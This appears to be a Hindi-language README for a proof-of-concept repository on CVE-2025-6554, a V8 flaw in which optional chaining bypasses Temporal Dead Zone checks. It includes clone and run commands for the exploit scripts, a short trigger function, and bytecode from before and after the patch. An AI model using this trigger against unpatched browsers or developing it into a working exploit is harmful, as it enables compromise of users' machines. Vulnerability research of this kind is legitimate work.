
CVE-2025-6554 PoC
⚠️ सुरक्षा अनुसंधान परियोजना - यह परियोजना केवल सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है। कृपया इसे उत्पादन वातावरण में उपयोग न करें।
CVE-2025-6554 Chrome V8 इंजन में एक गंभीर भेद्यता है, जो जावास्क्रिप्ट में "Temporal Dead Zone" (TDZ) जाँच तंत्र से संबंधित है। यह परियोजना भेद्यता का पूर्ण प्रूफ-ऑफ-कॉन्सेप्ट कोड और प्रदर्शन उपकरण प्रदान करती है।
यह भेद्यता V8 इंजन में वैकल्पिक श्रृंखलाकरण ऑपरेटर (?.) को संसाधित करते समय मौजूद है, जहाँ यह ठीक से जाँच नहीं करता कि चर प्रारंभ किया गया है या नहीं, जिससे अघोषित चरों तक पहुँच संभव होती है, TDZ सुरक्षा तंत्र को दरकिनार करते हुए।
git clone https://github.com/9Insomnie/CVE-2025-6554.git
cd CVE-2025-6554
CVE-2025-6554/
├── Exploit.js # मूल शोषण कोड
├── Test-Exploit.js # परीक्षण संस्करण
├── poc.html # पता लगाने की फ़ाइल
├── README.md # परियोजना विवरण
└── 使用说明.md # विस्तृत उपयोग गाइड
# V8 के d8 डीबगर का उपयोग करके चलाएँ
c:\path\to\v8\out\x64.debug\d8 --allow-natives-syntax --print-bytecode Exploit.js
# परीक्षण संस्करण चलाएँ
node Test-Exploit.js
# या मूल शोषण कोड चलाएँ
node Exploit.js
सीधे ब्राउज़र में HTML फ़ाइल खोलकर परीक्षण करें (संबंधित सुविधाओं का समर्थन आवश्यक)।
function leak_hole() {
let x;
delete x?.[y]?.a; // अघोषित चर y का उपयोग
return y; // ReferenceError उत्पन्न होना चाहिए
let y; // y यहाँ घोषित किया गया है
}
पैच से पहले:
0x32600100133 @ 11 : b6 00 ThrowReferenceErrorIfHole [0]
पैच के बाद:
0x29f00100133 @ 11 : b6 00 ThrowReferenceErrorIfHole [0]
0x29f00100144 @ 28 : b6 00 ThrowReferenceErrorIfHole [0] // नई जाँच
delete x?.[y]?.a# जाँचें कि भेद्यता मौजूद है या नहीं
node Test-Exploit.js
# विस्तृत बाइटकोड देखें
d8 --allow-natives-syntax --print-bytecode Exploit.js
यह भेद्यता सुरक्षा शोधकर्ताओं द्वारा खोजी गई, V8 इंजन में TDZ जाँच तंत्र से संबंधित है। वैकल्पिक श्रृंखलाकरण ऑपरेटर के माध्यम से, हमलावर चर प्रारंभ जाँच को दरकिनार कर सकता है और मेमोरी नियंत्रण प्राप्त कर सकता है।
यह परियोजना MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
⚠️ अस्वीकरण: यह परियोजना केवल सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है। उपयोगकर्ता अपने जोखिम पर उपयोग करने के लिए जिम्मेदार है, लेखक किसी भी कानूनी दायित्व को स्वीकार नहीं करता है।
🔒 सुरक्षा रिपोर्ट: यदि आप कोई नया सुरक्षा मुद्दा पाते हैं, तो कृपया GitHub Issues के माध्यम से संपर्क करें।